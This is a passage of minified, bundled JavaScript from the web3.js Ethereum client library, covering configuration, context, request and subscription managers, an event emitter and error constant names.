                            if (n.length !== this._requests.size) throw this._abortAllRequests("Invalid batch response"), new o.ResponseError(n, `Batch request size mismatch the results size. Requests: ${this._requests.size}, Responses: ${n.length}`);
                            const s = this.requests.map((e)=>e.id).map(Number).sort((e, t)=>e - t), a = n.map((e)=>e.id).map(Number).sort((e, t)=>e - t);
                            if (JSON.stringify(s) !== JSON.stringify(a)) throw this._abortAllRequests("Invalid batch response"), new o.ResponseError(n, `Batch request mismatch the results. Requests: [${s.join()}], Responses: [${a.join()}]`);
                            for (const e of n)i.jsonRpc.isResponseWithResult(e) ? null === (t = this._requests.get(e.id)) || void 0 === t || t.promise.resolve(e.result) : i.jsonRpc.isResponseWithError(e) && (null === (r = this._requests.get(e.id)) || void 0 === r || r.promise.reject(e.error));
                            e.resolve(n);
                        });
                    }
                    _abortAllRequests(e) {
                        for (const { promise: t } of this._requests.values())t.reject(new o.OperationAbortError(e));
                    }
                };
            },
            6171: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Config = t.Web3ConfigEvent = void 0;
                const n = r(5071), i = r(9634), o = r(8976);
                var s;
                !function(e) {
                    e.CONFIG_CHANGE = "CONFIG_CHANGE";
                }(s = t.Web3ConfigEvent || (t.Web3ConfigEvent = {}));
                class a extends o.Web3EventEmitter {
                    constructor(e){
                        super(), this.config = {
                            handleRevert: !1,
                            defaultAccount: void 0,
                            defaultBlock: "latest",
                            transactionBlockTimeout: 50,
                            transactionConfirmationBlocks: 24,
                            transactionPollingInterval: 1e3,
                            transactionPollingTimeout: 75e4,
                            transactionReceiptPollingInterval: void 0,
                            transactionSendTimeout: 75e4,
                            transactionConfirmationPollingInterval: void 0,
                            blockHeaderTimeout: 10,
                            maxListenersWarningThreshold: 100,
                            defaultNetworkId: void 0,
                            defaultChain: "mainnet",
                            defaultHardfork: "london",
                            defaultCommon: void 0,
                            defaultTransactionType: "0x0",
                            defaultMaxPriorityFeePerGas: (0, i.toHex)(25e8),
                            enableExperimentalFeatures: {
                                useSubscriptionWhenCheckingBlockTimeout: !1,
                                useRpcCallSpecification: !1
                            },
                            transactionBuilder: void 0,
                            transactionTypeParser: void 0
                        }, this.setConfig(null != e ? e : {});
                    }
                    setConfig(e) {
                        Object.assign(this.config, e);
                    }
                    get handleRevert() {
                        return this.config.handleRevert;
                    }
                    set handleRevert(e) {
                        this._triggerConfigChange("handleRevert", e), this.config.handleRevert = e;
                    }
                    get defaultAccount() {
                        return this.config.defaultAccount;
                    }
                    set defaultAccount(e) {
                        this._triggerConfigChange("defaultAccount", e), this.config.defaultAccount = e;
                    }
                    get defaultBlock() {
                        return this.config.defaultBlock;
                    }
                    set defaultBlock(e) {
                        this._triggerConfigChange("defaultBlock", e), this.config.defaultBlock = e;
                    }
                    get transactionSendTimeout() {
                        return this.config.transactionSendTimeout;
                    }
                    set transactionSendTimeout(e) {
                        this._triggerConfigChange("transactionSendTimeout", e), this.config.transactionSendTimeout = e;
                    }
                    get transactionBlockTimeout() {
                        return this.config.transactionBlockTimeout;
                    }
                    set transactionBlockTimeout(e) {
                        this._triggerConfigChange("transactionBlockTimeout", e), this.config.transactionBlockTimeout = e;
                    }
                    get transactionConfirmationBlocks() {
                        return this.config.transactionConfirmationBlocks;
                    }
                    set transactionConfirmationBlocks(e) {
                        this._triggerConfigChange("transactionConfirmationBlocks", e), this.config.transactionConfirmationBlocks = e;
                    }
                    get transactionPollingInterval() {
                        return this.config.transactionPollingInterval;
                    }
                    set transactionPollingInterval(e) {
                        this._triggerConfigChange("transactionPollingInterval", e), this.config.transactionPollingInterval = e, this.transactionReceiptPollingInterval = e, this.transactionConfirmationPollingInterval = e;
                    }
                    get transactionPollingTimeout() {
                        return this.config.transactionPollingTimeout;
                    }
                    set transactionPollingTimeout(e) {
                        this._triggerConfigChange("transactionPollingTimeout", e), this.config.transactionPollingTimeout = e;
                    }
                    get transactionReceiptPollingInterval() {
                        return this.config.transactionReceiptPollingInterval;
                    }
                    set transactionReceiptPollingInterval(e) {
                        this._triggerConfigChange("transactionReceiptPollingInterval", e), this.config.transactionReceiptPollingInterval = e;
                    }
                    get transactionConfirmationPollingInterval() {
                        return this.config.transactionConfirmationPollingInterval;
                    }
                    set transactionConfirmationPollingInterval(e) {
                        this._triggerConfigChange("transactionConfirmationPollingInterval", e), this.config.transactionConfirmationPollingInterval = e;
                    }
                    get blockHeaderTimeout() {
                        return this.config.blockHeaderTimeout;
                    }
                    set blockHeaderTimeout(e) {
                        this._triggerConfigChange("blockHeaderTimeout", e), this.config.blockHeaderTimeout = e;
                    }
                    get enableExperimentalFeatures() {
                        return this.config.enableExperimentalFeatures;
                    }
                    set enableExperimentalFeatures(e) {
                        this._triggerConfigChange("enableExperimentalFeatures", e), this.config.enableExperimentalFeatures = e;
                    }
                    get maxListenersWarningThreshold() {
                        return this.config.maxListenersWarningThreshold;
                    }
                    set maxListenersWarningThreshold(e) {
                        this._triggerConfigChange("maxListenersWarningThreshold", e), this.setMaxListenerWarningThreshold(e), this.config.maxListenersWarningThreshold = e;
                    }
                    get defaultNetworkId() {
                        return this.config.defaultNetworkId;
                    }
                    set defaultNetworkId(e) {
                        this._triggerConfigChange("defaultNetworkId", e), this.config.defaultNetworkId = e;
                    }
                    get defaultChain() {
                        return this.config.defaultChain;
                    }
                    set defaultChain(e) {
                        if (!(0, i.isNullish)(this.config.defaultCommon) && !(0, i.isNullish)(this.config.defaultCommon.baseChain) && e !== this.config.defaultCommon.baseChain) throw new n.ConfigChainMismatchError(this.config.defaultChain, e);
                        this._triggerConfigChange("defaultChain", e), this.config.defaultChain = e;
                    }
                    get defaultHardfork() {
                        return this.config.defaultHardfork;
                    }
                    set defaultHardfork(e) {
                        if (!(0, i.isNullish)(this.config.defaultCommon) && !(0, i.isNullish)(this.config.defaultCommon.hardfork) && e !== this.config.defaultCommon.hardfork) throw new n.ConfigHardforkMismatchError(this.config.defaultCommon.hardfork, e);
                        this._triggerConfigChange("defaultHardfork", e), this.config.defaultHardfork = e;
                    }
                    get defaultCommon() {
                        return this.config.defaultCommon;
                    }
                    set defaultCommon(e) {
                        if (!(0, i.isNullish)(this.config.defaultHardfork) && !(0, i.isNullish)(e) && !(0, i.isNullish)(e.hardfork) && this.config.defaultHardfork !== e.hardfork) throw new n.ConfigHardforkMismatchError(this.config.defaultHardfork, e.hardfork);
                        if (!(0, i.isNullish)(this.config.defaultChain) && !(0, i.isNullish)(e) && !(0, i.isNullish)(e.baseChain) && this.config.defaultChain !== e.baseChain) throw new n.ConfigChainMismatchError(this.config.defaultChain, e.baseChain);
                        this._triggerConfigChange("defaultCommon", e), this.config.defaultCommon = e;
                    }
                    get defaultTransactionType() {
                        return this.config.defaultTransactionType;
                    }
                    set defaultTransactionType(e) {
                        this._triggerConfigChange("defaultTransactionType", e), this.config.defaultTransactionType = e;
                    }
                    get defaultMaxPriorityFeePerGas() {
                        return this.config.defaultMaxPriorityFeePerGas;
                    }
                    set defaultMaxPriorityFeePerGas(e) {
                        this._triggerConfigChange("defaultMaxPriorityFeePerGas", e), this.config.defaultMaxPriorityFeePerGas = e;
                    }
                    get transactionBuilder() {
                        return this.config.transactionBuilder;
                    }
                    set transactionBuilder(e) {
                        this._triggerConfigChange("transactionBuilder", e), this.config.transactionBuilder = e;
                    }
                    get transactionTypeParser() {
                        return this.config.transactionTypeParser;
                    }
                    set transactionTypeParser(e) {
                        this._triggerConfigChange("transactionTypeParser", e), this.config.transactionTypeParser = e;
                    }
                    _triggerConfigChange(e, t) {
                        this.emit(s.CONFIG_CHANGE, {
                            name: e,
                            oldValue: this.config[e],
                            newValue: t
                        });
                    }
                }
                t.Web3Config = a;
            },
            8174: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3EthPluginBase = t.Web3PluginBase = t.Web3Context = void 0;
                const n = r(9634), i = r(5071), o = r(7003), s = r(6171), a = r(8441), u = r(860), c = r(8202);
                class l extends s.Web3Config {
                    constructor(e){
                        var t;
                        if (super(), this.providers = a.Web3RequestManager.providers, (0, n.isNullish)(e) || "string" == typeof e && "" !== e.trim() || (0, o.isSupportedProvider)(e)) return this._requestManager = new a.Web3RequestManager(e), void (this._subscriptionManager = new u.Web3SubscriptionManager(this._requestManager, {}));
                        const { config: r, provider: i, requestManager: s, subscriptionManager: c, registeredSubscriptions: l, accountProvider: d, wallet: h } = e;
                        this.setConfig(null != r ? r : {}), this._requestManager = null != s ? s : new a.Web3RequestManager(i, null === (t = null == r ? void 0 : r.enableExperimentalFeatures) || void 0 === t ? void 0 : t.useSubscriptionWhenCheckingBlockTimeout), this._subscriptionManager = c || new u.Web3SubscriptionManager(this.requestManager, null != l ? l : {}), d && (this._accountProvider = d), h && (this._wallet = h);
                    }
                    get requestManager() {
                        return this._requestManager;
                    }
                    get subscriptionManager() {
                        return this._subscriptionManager;
                    }
                    get wallet() {
                        return this._wallet;
                    }
                    get accountProvider() {
                        return this._accountProvider;
                    }
                    static fromContextObject(...e) {
                        return new this(...e.reverse());
                    }
                    getContextObject() {
                        var e;
                        return {
                            config: this.config,
                            provider: this.provider,
                            requestManager: this.requestManager,
                            subscriptionManager: this.subscriptionManager,
                            registeredSubscriptions: null === (e = this.subscriptionManager) || void 0 === e ? void 0 : e.registeredSubscriptions,
                            providers: this.providers,
                            wallet: this.wallet,
                            accountProvider: this.accountProvider
                        };
                    }
                    use(e, ...t) {
                        const r = new e(...[
                            ...t,
                            this.getContextObject()
                        ]);
                        return this.on(s.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            r.setConfig({
                                [e.name]: e.newValue
                            });
                        }), r;
                    }
                    link(e) {
                        this.setConfig(e.config), this._requestManager = e.requestManager, this.provider = e.provider, this._subscriptionManager = e.subscriptionManager, this._wallet = e.wallet, this._accountProvider = e._accountProvider, e.on(s.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            this.setConfig({
                                [e.name]: e.newValue
                            });
                        });
                    }
                    registerPlugin(e) {
                        if (void 0 !== this[e.pluginNamespace]) throw new i.ExistingPluginNamespaceError(e.pluginNamespace);
                        const t = {
                            [e.pluginNamespace]: e
                        };
                        t[e.pluginNamespace].link(this), Object.assign(this, t);
                    }
                    get provider() {
                        return this.currentProvider;
                    }
                    set provider(e) {
                        this.requestManager.setProvider(e);
                    }
                    get currentProvider() {
                        return this.requestManager.provider;
                    }
                    set currentProvider(e) {
                        this.requestManager.setProvider(e);
                    }
                    get givenProvider() {
                        return l.givenProvider;
                    }
                    setProvider(e) {
                        return this.provider = e, !0;
                    }
                    get BatchRequest() {
                        return c.Web3BatchRequest.bind(void 0, this._requestManager);
                    }
                }
                t.Web3Context = l, l.providers = a.Web3RequestManager.providers;
                class d extends l {
                }
                t.Web3PluginBase = d, t.Web3EthPluginBase = class extends d {
                };
            },
            8976: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3EventEmitter = void 0;
                const n = r(2699);
                t.Web3EventEmitter = class {
                    constructor(){
                        this._emitter = new n.EventEmitter;
                    }
                    on(e, t) {
                        this._emitter.on(e, t);
                    }
                    once(e, t) {
                        this._emitter.once(e, t);
                    }
                    off(e, t) {
                        this._emitter.off(e, t);
                    }
                    emit(e, t) {
                        this._emitter.emit(e, t);
                    }
                    listenerCount(e) {
                        return this._emitter.listenerCount(e);
                    }
                    listeners(e) {
                        return this._emitter.listeners(e);
                    }
                    eventNames() {
                        return this._emitter.eventNames();
                    }
                    removeAllListeners() {
                        return this._emitter.removeAllListeners();
                    }
                    setMaxListenerWarningThreshold(e) {
                        this._emitter.setMaxListeners(e);
                    }
                    getMaxListeners() {
                        return this._emitter.getMaxListeners();
                    }
                };
            },
            4738: function(e, t, r) {
                "use strict";
                var n, i = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3PromiEvent = void 0;
                const o = r(8976);
                class s extends o.Web3EventEmitter {
                    constructor(e){
                        super(), this[n] = "Promise", this._promise = new Promise(e);
                    }
                    then(e, t) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.then(e, t);
                        });
                    }
                    catch(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.catch(e);
                        });
                    }
                    finally(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.finally(e);
                        });
                    }
                    on(e, t) {
                        return super.on(e, t), this;
                    }
                    once(e, t) {
                        return super.once(e, t), this;
                    }
                }
                t.Web3PromiEvent = s, n = Symbol.toStringTag;
            },
            8441: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                }, i = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3RequestManager = t.Web3RequestManagerEvent = void 0;
                const o = r(5071), s = i(r(6343)), a = i(r(1161)), u = r(9634), c = r(7003), l = r(8976);
                var d;
                !function(e) {
                    e.PROVIDER_CHANGED = "PROVIDER_CHANGED", e.BEFORE_PROVIDER_CHANGE = "BEFORE_PROVIDER_CHANGE";
                }(d = t.Web3RequestManagerEvent || (t.Web3RequestManagerEvent = {}));
                const h = {
                    HttpProvider: s.default,
                    WebsocketProvider: a.default
                };
                class f extends l.Web3EventEmitter {
                    constructor(e, t){
                        super(), (0, u.isNullish)(e) || this.setProvider(e), this.useRpcCallSpecification = t;
                    }
                    static get providers() {
                        return h;
                    }
                    get provider() {
                        return this._provider;
                    }
                    get providers() {
                        return h;
                    }
                    setProvider(e) {
                        let t;
                        if (e && "string" == typeof e && this.providers) {
                            if (/^http(s)?:\/\//i.test(e)) t = new this.providers.HttpProvider(e);
                            else {
                                if (!/^ws(s)?:\/\//i.test(e)) throw new o.ProviderError(`Can't autodetect provider for "${e}"`);
                                t = new this.providers.WebsocketProvider(e);
                            }
                        } else t = (0, u.isNullish)(e) ? void 0 : e;
                        return this.emit(d.BEFORE_PROVIDER_CHANGE, this._provider), this._provider = t, this.emit(d.PROVIDER_CHANGED, this._provider), !0;
                    }
                    send(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this._sendRequest(e);
                            if (u.jsonRpc.isResponseWithResult(t)) return t.result;
                            throw new o.ResponseError(t);
                        });
                    }
                    sendBatch(e) {
                        return n(this, void 0, void 0, function*() {
                            return yield this._sendRequest(e);
                        });
                    }
                    _sendRequest(e) {
                        return n(this, void 0, void 0, function*() {
                            const { provider: t } = this;
                            if ((0, u.isNullish)(t)) throw new o.ProviderError("Provider not available. Use `.setProvider` or `.provider=` to initialize the provider.");
                            const r = u.jsonRpc.isBatchRequest(e) ? u.jsonRpc.toBatchPayload(e) : u.jsonRpc.toPayload(e);
                            if ((0, c.isWeb3Provider)(t)) {
                                let e;
                                try {
                                    e = yield t.request(r);
                                } catch (t) {
                                    e = t;
                                }
                                return this._processJsonRpcResponse(r, e, {
                                    legacy: !1,
                                    error: !1
                                });
                            }
                            if ((0, c.isEIP1193Provider)(t)) return t.request(r).then((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !1
                                })).catch((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !0
                                }));
                            if ((0, c.isLegacyRequestProvider)(t)) return new Promise((e, n)=>{
                                const i = (e)=>n(this._processJsonRpcResponse(r, e, {
                                        legacy: !0,
                                        error: !0
                                    })), o = (t)=>e(this._processJsonRpcResponse(r, t, {
                                        legacy: !0,
                                        error: !1
                                    })), s = t.request(r, (e, t)=>e ? i(e) : o(t));
                                (0, u.isPromise)(s) && s.then(o).catch(i);
                            });
                            if ((0, c.isLegacySendProvider)(t)) return new Promise((e, n)=>{
                                t.send(r, (t, i)=>{
                                    if (t) return n(this._processJsonRpcResponse(r, t, {
                                        legacy: !0,
                                        error: !0
                                    }));
                                    if ((0, u.isNullish)(i)) throw new o.ResponseError("", 'Got a "nullish" response from provider.');
                                    return e(this._processJsonRpcResponse(r, i, {
                                        legacy: !0,
                                        error: !1
                                    }));
                                });
                            });
                            if ((0, c.isLegacySendAsyncProvider)(t)) return t.sendAsync(r).then((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !1
                                })).catch((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !0
                                }));
                            throw new o.ProviderError("Provider does not have a request or send method to use.");
                        });
                    }
                    _processJsonRpcResponse(e, t, { legacy: r, error: n }) {
                        if ((0, u.isNullish)(t)) return this._buildResponse(e, null, n);
                        if (u.jsonRpc.isResponseWithError(t)) {
                            if (this.useRpcCallSpecification && (0, u.isResponseRpcError)(t)) {
                                const e = t;
                                if (o.rpcErrorsMap.get(e.error.code)) throw new (o.rpcErrorsMap.get(e.error.code)).error(e);
                                throw new o.RpcError(e);
                            }
                            if (!f._isReverted(t)) throw new o.InvalidResponseError(t, e);
                        }
                        if (u.jsonRpc.isResponseWithResult(t)) return t;
                        if (t instanceof Error) throw f._isReverted(t), t;
                        if (!r && u.jsonRpc.isBatchRequest(e) && u.jsonRpc.isBatchResponse(t)) return t;
                        if (r && !n && u.jsonRpc.isBatchRequest(e)) return t;
                        if (r && n && u.jsonRpc.isBatchRequest(e)) throw t;
                        if (r && !u.jsonRpc.isResponseWithError(t) && !u.jsonRpc.isResponseWithResult(t)) return this._buildResponse(e, t, n);
                        if (u.jsonRpc.isBatchRequest(e) && !Array.isArray(t)) throw new o.ResponseError(t, "Got normal response for a batch request.");
                        if (!u.jsonRpc.isBatchRequest(e) && Array.isArray(t)) throw new o.ResponseError(t, "Got batch response for a normal request.");
                        if ((u.jsonRpc.isResponseWithError(t) || u.jsonRpc.isResponseWithResult(t)) && !u.jsonRpc.isBatchRequest(e) && t.id && e.id !== t.id) throw new o.InvalidResponseError(t);
                        throw new o.ResponseError(t, "Invalid response");
                    }
                    static _isReverted(e) {
                        let t;
                        if (u.jsonRpc.isResponseWithError(e) ? t = e.error : e instanceof Error && (t = e), null == t ? void 0 : t.message.includes("revert")) throw new o.ContractExecutionError(t);
                        return !1;
                    }
                    _buildResponse(e, t, r) {
                        const n = {
                            jsonrpc: "2.0",
                            id: u.jsonRpc.isBatchRequest(e) ? e[0].id : "id" in e ? e.id : null
                        };
                        return r ? Object.assign(Object.assign({}, n), {
                            error: t
                        }) : Object.assign(Object.assign({}, n), {
                            result: t
                        });
                    }
                }
                t.Web3RequestManager = f;
            },
            860: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3SubscriptionManager = void 0;
                const i = r(9970), o = r(5071), s = r(9634), a = r(7003), u = r(8441);
                t.Web3SubscriptionManager = class {
                    constructor(e, t, r = !1){
                        this.requestManager = e, this.registeredSubscriptions = t, this.tolerateUnlinkedSubscription = r, this._subscriptions = new Map, this.requestManager.on(u.Web3RequestManagerEvent.BEFORE_PROVIDER_CHANGE, ()=>n(this, void 0, void 0, function*() {
                                yield this.unsubscribe();
                            })), this.requestManager.on(u.Web3RequestManagerEvent.PROVIDER_CHANGED, ()=>{
                            this.clear(), this.listenToProviderEvents();
                        }), this.listenToProviderEvents();
                    }
                    listenToProviderEvents() {
                        const e = this.requestManager.provider;
                        this.requestManager.provider && ("function" != typeof (null == e ? void 0 : e.supportsSubscriptions) || (null == e ? void 0 : e.supportsSubscriptions())) && "function" == typeof this.requestManager.provider.on && ("function" == typeof this.requestManager.provider.request ? this.requestManager.provider.on("message", (e)=>this.messageListener(e)) : e.on("data", (e)=>this.messageListener(e)));
                    }
                    messageListener(e) {
                        var t, r, n;
                        if (!e) throw new o.SubscriptionError("Should not call messageListener with no data. Type was");
                        const i = (null === (t = e.params) || void 0 === t ? void 0 : t.subscription) || (null === (r = e.data) || void 0 === r ? void 0 : r.subscription) || (null === (n = e.id) || void 0 === n ? void 0 : n.toString(16));
                        if (i) {
                            const t = this._subscriptions.get(i);
                            null == t || t.processSubscriptionData(e);
                        }
                    }
                    subscribe(e, t, r = i.DEFAULT_RETURN_FORMAT) {
                        return n(this, void 0, void 0, function*() {
                            const n = this.registeredSubscriptions[e];
                            if (!n) throw new o.SubscriptionError("Invalid subscription type");
                            const i = new n(null != t ? t : void 0, {
                                subscriptionManager: this,
                                returnFormat: r
                            });
                            return yield this.addSubscription(i), i;
                        });
                    }
                    get subscriptions() {
                        return this._subscriptions;
                    }
                    addSubscription(e) {
                        return n(this, void 0, void 0, function*() {
                            if (!this.requestManager.provider) throw new o.ProviderError("Provider not available");
                            if (!this.supportsSubscriptions()) throw new o.SubscriptionError("The current provider does not support subscriptions");
                            if (e.id && this._subscriptions.has(e.id)) throw new o.SubscriptionError(`Subscription with id "${e.id}" already exists`);
                            if (yield e.sendSubscriptionRequest(), (0, s.isNullish)(e.id)) throw new o.SubscriptionError("Subscription is not subscribed yet.");
                            return this._subscriptions.set(e.id, e), e.id;
                        });
                    }
                    removeSubscription(e) {
                        return n(this, void 0, void 0, function*() {
                            const { id: t } = e;
                            if ((0, s.isNullish)(t)) throw new o.SubscriptionError("Subscription is not subscribed yet. Or, had already been unsubscribed but not through the Subscription Manager.");
                            if (!this._subscriptions.has(t) && !this.tolerateUnlinkedSubscription) throw new o.SubscriptionError(`Subscription with id "${t.toString()}" does not exists`);
                            return yield e.sendUnsubscribeRequest(), this._subscriptions.delete(t), t;
                        });
                    }
                    unsubscribe(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = [];
                            for (const [r, n] of this.subscriptions.entries())(!e || "function" == typeof e && e({
                                id: r,
                                sub: n
                            })) && t.push(this.removeSubscription(n));
                            return Promise.all(t);
                        });
                    }
                    clear() {
                        this._subscriptions.clear();
                    }
                    supportsSubscriptions() {
                        return !(0, s.isNullish)(this.requestManager.provider) && (0, a.isSupportSubscriptions)(this.requestManager.provider);
                    }
                };
            },
            1819: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Subscription = void 0;
                const i = r(9970), o = r(9634), s = r(5071), a = r(860), u = r(8976);
                class c extends u.Web3EventEmitter {
                    constructor(e, t){
                        var r;
                        super(), this.args = e;
                        const { requestManager: n } = t, { subscriptionManager: o } = t;
                        if (n && o) throw new s.SubscriptionError("Only requestManager or subscriptionManager should be provided at Subscription constructor");
                        if (!n && !o) throw new s.SubscriptionError("Either requestManager or subscriptionManager should be provided at Subscription constructor");
                        this._subscriptionManager = n ? new a.Web3SubscriptionManager(n, {}, !0) : o, this._returnFormat = null !== (r = null == t ? void 0 : t.returnFormat) && void 0 !== r ? r : i.DEFAULT_RETURN_FORMAT;
                    }
                    get id() {
                        return this._id;
                    }
                    get lastBlock() {
                        return this._lastBlock;
                    }
                    subscribe() {
                        return n(this, void 0, void 0, function*() {
                            return this._subscriptionManager.addSubscription(this);
                        });
                    }
                    processSubscriptionData(e) {
                        var t, r;
                        (null == e ? void 0 : e.data) ? this._processSubscriptionResult(null !== (r = null === (t = null == e ? void 0 : e.data) || void 0 === t ? void 0 : t.result) && void 0 !== r ? r : null == e ? void 0 : e.data) : e && o.jsonRpc.isResponseWithNotification(e) && this._processSubscriptionResult(null == e ? void 0 : e.params.result);
                    }
                    sendSubscriptionRequest() {
                        return n(this, void 0, void 0, function*() {
                            return this._id = yield this._subscriptionManager.requestManager.send({
                                method: "eth_subscribe",
                                params: this._buildSubscriptionParams()
                            }), this._id;
                        });
                    }
                    get returnFormat() {
                        return this._returnFormat;
                    }
                    resubscribe() {
                        return n(this, void 0, void 0, function*() {
                            yield this.unsubscribe(), yield this.subscribe();
                        });
                    }
                    unsubscribe() {
                        return n(this, void 0, void 0, function*() {
                            this.id && (yield this._subscriptionManager.removeSubscription(this));
                        });
                    }
                    sendUnsubscribeRequest() {
                        return n(this, void 0, void 0, function*() {
                            yield this._subscriptionManager.requestManager.send({
                                method: "eth_unsubscribe",
                                params: [
                                    this.id
                                ]
                            }), this._id = void 0;
                        });
                    }
                    _processSubscriptionResult(e) {}
                    _processSubscriptionError(e) {}
                    _buildSubscriptionParams() {
                        throw new Error("Implement in the child class");
                    }
                }
                t.Web3Subscription = c;
            },
            7639: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL = t.ERR_TX_POLLING_TIMEOUT = t.ERR_TX_DATA_AND_INPUT = t.ERR_TX_UNSUPPORTED_TYPE = t.ERR_TX_UNSUPPORTED_EIP_1559 = t.ERR_TX_UNABLE_TO_POPULATE_NONCE = t.ERR_TX_INVALID_NONCE_OR_CHAIN_ID = t.ERR_TX_INVALID_OBJECT = t.ERR_TX_INVALID_LEGACY_FEE_MARKET = t.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE = t.ERR_TX_INVALID_FEE_MARKET_GAS = t.ERR_TX_INVALID_LEGACY_GAS = t.ERR_TX_MISSING_GAS = t.ERR_TX_MISSING_CHAIN_INFO = t.ERR_TX_INVALID_CHAIN_INFO = t.ERR_TX_CHAIN_ID_MISMATCH = t.ERR_TX_MISSING_CUSTOM_CHAIN_ID = t.ERR_TX_MISSING_CUSTOM_CHAIN = t.ERR_TX_INVALID_CALL = t.ERR_TX_INVALID_SENDER = t.ERR_RAW_TX_UNDEFINED = t.ERR_TX_OUT_OF_GAS = t.ERR_TX_REVERT_WITHOUT_REASON = t.ERR_TX_CONTRACT_NOT_STORED = t.ERR_TX_NO_CONTRACT_ADDRESS = t.ERR_TX_REVERT_TRANSACTION = t.ERR_TX_REVERT_INSTRUCTION = t.ERR_TX = t.ERR_CONTRACT_TX_DATA_AND_INPUT = t.ERR_CONTRACT_EXECUTION_REVERTED = t.ERR_CONTRACT_INSTANTIATION = t.ERR_CONTRACT_MISSING_FROM_ADDRESS = t.ERR_CONTRACT_MISSING_ADDRESS = t.ERR_CONTRACT_MISSING_DEPLOY_DATA = t.ERR_CONTRACT_RESERVED_EVENT = t.ERR_CONTRACT_EVENT_NOT_EXISTS = t.ERR_CONTRACT_REQUIRED_CALLBACK = t.ERR_CONTRACT_ABI_MISSING = t.ERR_CONTRACT_RESOLVER_MISSING = t.ERR_CONTRACT = t.ERR_INVALID_METHOD_PARAMS = t.ERR_EXISTING_PLUGIN_NAMESPACE = t.ERR_ABI_ENCODING = t.ERR_OPERATION_ABORT = t.ERR_OPERATION_TIMEOUT = t.ERR_METHOD_NOT_IMPLEMENTED = t.ERR_FORMATTERS = t.ERR_PARAM = t.ERR_INVALID_RESPONSE = t.ERR_RESPONSE = void 0, t.ERR_INVALID_ADDRESS = t.ERR_INVALID_UNIT = t.ERR_INVALID_NUMBER = t.ERR_INVALID_BYTES = t.ERR_INVALID_STRING = t.ERR_ENS_NETWORK_NOT_SYNCED = t.ERR_ENS_UNSUPPORTED_NETWORK = t.ERR_ENS_CHECK_INTERFACE_SUPPORT = t.JSONRPC_ERR_CHAIN_DISCONNECTED = t.JSONRPC_ERR_DISCONNECTED = t.JSONRPC_ERR_UNSUPPORTED_METHOD = t.JSONRPC_ERR_UNAUTHORIZED = t.JSONRPC_ERR_REJECTED_REQUEST = t.GENESIS_BLOCK_NUMBER = t.ERR_INVALID_SIGNATURE = t.ERR_SIGNATURE_FAILED = t.ERR_PBKDF2_ITERATIONS = t.ERR_INVALID_KEYSTORE = t.ERR_IV_LENGTH = t.ERR_INVALID_PASSWORD = t.ERR_KEY_VERSION_UNSUPPORTED = t.ERR_KEY_DERIVATION_FAIL = t.ERR_UNSUPPORTED_KDF = t.ERR_INVALID_PRIVATE_KEY = t.ERR_PRIVATE_KEY_LENGTH = t.ERR_WS_PROVIDER = t.ERR_SUBSCRIPTION = t.ERR_INVALID_CLIENT = t.ERR_INVALID_PROVIDER = t.ERR_PROVIDER = t.ERR_REQ_ALREADY_SENT = t.ERR_CONN_PENDING_REQUESTS = 